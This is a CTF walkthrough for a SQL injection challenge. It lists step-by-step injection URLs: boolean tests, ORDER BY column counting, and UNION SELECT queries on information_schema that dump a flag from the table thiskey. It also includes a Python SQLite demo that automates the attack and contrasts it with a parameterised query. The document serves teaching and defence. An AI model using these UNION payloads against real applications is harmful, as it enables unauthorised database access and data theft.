Link: http://ctf5.shiyanbar.com/8/index.php?id=1
Method: SQL injection (PHP + MySQL)
1. First, determine whether the parameter is an injection point
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=1
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2
The two pages render differently, so the id parameter reaches the WHERE clause unescaped: it is an injection point.
2. Guess the number of columns in the original SELECT
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
"order by 2" renders normally and "order by 3" errors out (ORDER BY refers to a column position that does not exist), so the query returns 2 columns. A UNION SELECT must supply exactly that many columns.
3. Enumerate the databases
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
This lists every schema the MySQL user can see. Using union select 1,database() in the same position shows that my_db is the current database.
4. Enumerate the tables in that database
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'
Only one table comes back: thiskey.
5. List the columns of the thiskey table
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_schema='my_db'
Filtering only on table_schema returns the columns of every table in my_db; adding and table_name='thiskey' narrows it to the one table. Either way a single column shows up: k0y.
6. Read the data in the k0y column
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
For the layout of the information_schema database see http://help.wopus.org/mysql-manage/607.html
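The whole procedure above (boolean test, ORDER BY column count, UNION SELECT extraction) and the fix for it, as an added offline example that is not the challenge's PHP source. It runs against an in-memory SQLite database standing in for MySQL: sqlite_master takes the role of information_schema.tables, and the table news, the table/column names thiskey and k0y, and the flag value are constructed for the demo. The vulnerable function mirrors the PHP anti-pattern of concatenating $_GET['id'] into the query string; the safe one binds it as a parameter.

```python
import sqlite3


def make_db():
    """Constructed schema: a 2-column table the page reads from, plus the target table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        CREATE TABLE thiskey (k0y TEXT);
        INSERT INTO thiskey VALUES ('flag{constructed-for-demo}');
        """
    )
    return conn


def vulnerable_query(conn, user_id):
    """Mirrors  "SELECT id,title FROM news WHERE id=" . $_GET['id']  (string concatenation)."""
    sql = "SELECT id, title FROM news WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def safe_query(conn, user_id):
    """Same query with a bound parameter: the input is treated as data, never as SQL."""
    return conn.execute("SELECT id, title FROM news WHERE id=?", (user_id,)).fetchall()


def is_injectable(conn):
    """Step 1: 'and 1=1' and 'and 1=2' give different output only if the input reaches WHERE."""
    return vulnerable_query(conn, "1 and 1=1") != vulnerable_query(conn, "1 and 1=2")


def count_columns(conn, max_cols=16):
    """Step 2: ORDER BY n fails as soon as n exceeds the column count of the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(conn, f"1 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump(conn, expr, source):
    """Steps 3-6: UNION SELECT with the same column count; the value we want rides in column 2."""
    baseline = vulnerable_query(conn, "1")          # rows the legitimate id=1 query returns
    rows = vulnerable_query(conn, f"1 union select 1,{expr} from {source}")
    return sorted(r[1] for r in rows if r not in baseline)


def exploit(conn):
    """Run the walkthrough end to end and return what each step recovered."""
    ncols = count_columns(conn)
    # sqlite_master stands in for information_schema.tables (assumption for the demo)
    tables = union_dump(conn, "name", "sqlite_master where type='table'")
    key = union_dump(conn, "k0y", "thiskey")
    return {"columns": ncols, "tables": tables, "key": key}


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db))
    print(exploit(db))
    # With a bound parameter the whole payload is compared against id as one value:
    # no UNION is executed, nothing from thiskey leaks.
    print("parameterised:", safe_query(db, "1 union select 1,k0y from thiskey"))
```

Note that MySQL would coerce the string '1 union select ...' to the number 1 (with a warning) when bound to an integer column, so the parameterised query there returns the id=1 row rather than nothing; in both engines the payload is data and the UNION never runs.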